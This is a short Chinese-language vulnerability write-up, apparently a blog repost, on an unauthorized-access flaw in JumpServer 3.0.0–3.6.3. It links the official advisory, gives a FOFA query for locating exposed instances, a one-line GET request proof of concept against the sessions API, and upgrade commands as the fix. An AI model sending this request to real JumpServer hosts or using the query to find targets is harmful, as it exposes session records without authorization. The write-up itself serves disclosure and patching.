1、简介
JumpServer是一款符合4A规范的开源堡垒机,帮助企业以更安全的方式管控和登录各种类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。
2、漏洞描述
JumpServer 在 3.0.0-3.6.3 版本存在未授权访问漏洞。由于系统权限配置存在不合理,导致未授权攻击者可以直接访问 /api/v1/terminal/sessions/ 相关路由
漏洞公告:https://github.com/jumpserver/jumpserver/security/advisories/GHSA-633x-3f4f-v9rw
3、受影响版本
3.0.0 <= JumpServer <= 3.6.3
4、FOFA语
fofa:app="JumpServer-堡垒机"
5、漏洞复现
POC
GET /api/v1/terminal/sessions/ HTTP/1.1
Host: XXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
6、整改建议
升级到安全版本:JumpServer >= 3.5.5 JumpServer >= 3.6.4
./jmsctl.sh backup_db #备份数据库
./jmsctl.sh check_update #检查可用更新
./jmsctl.sh upgrade [version] #升级指定版本
./jmsctl.sh start #启动jumpserver
标签:jmsctl,JumpServer,漏洞,sh,2023,授权,jumpserver
From: https://www.cnblogs.com/fuchangjiang/p/17713181.html